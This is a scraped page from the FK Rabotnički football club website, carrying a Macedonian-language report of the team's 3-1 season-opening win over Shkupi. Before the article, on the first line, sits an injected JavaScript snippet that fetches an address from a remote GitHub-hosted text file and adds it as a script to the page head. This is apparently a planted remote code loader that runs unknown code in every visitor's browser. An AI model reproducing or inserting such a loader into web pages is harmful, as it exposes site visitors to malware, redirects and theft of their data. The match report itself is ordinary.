;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Триумф над Шкупи (3-1) за убав старт на сезоната
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Триумф над Шкупи (3-1) за убав старт на сезоната

Работнички го победи Шкупи со 3-1 во првиот натпревар од новата сезона во Првата фудбалска сезона. Поубав старт тимот на Милан Илиевски и не можеше да посака. Триумфираше над еден од кандидатите за највисок пласман.

Нашиот тим поведе веќе во првата минута. Брзиот Мазари беше побрз дури и од првиот свиреж на судијата Александар Ставрев. По акцијата на Гандо Биала и нафрлувањето на Влатко Стојановски, Мазари со удар со глава ја смести топката зад грбот на Иљази.

Шкупи во продолжение се обиде преку Кристијан Трапановски, но Игор Алексовски беше одличен на голот.

Противникот израмни во 62.минута. По корнерот од десната страна, топката беше префрлена на втор дирек, а таму се најде Дарко Илиески и со глава погоди во целта.

Но, Работнички посакуваше триумф. Тренерот Милан Илиевски во игра го уфрли младиот напаѓач Георг Стојановски, кој со два потези го реши натпреварот. Во 81.минута изнуди пенал откако над него стартуваа дефанзивците на Шкупи, а пеналот во гол го претвори Мевљан Мурати.

Во судиското продолжение од натпреварот, Георг Стојановски и самиот се запиша меѓу стрелците тресејќи ја мрежата на Шкупи во 96.минута од мечот.

Во второто коло, Работнички му гостува на Силекс во Кратово.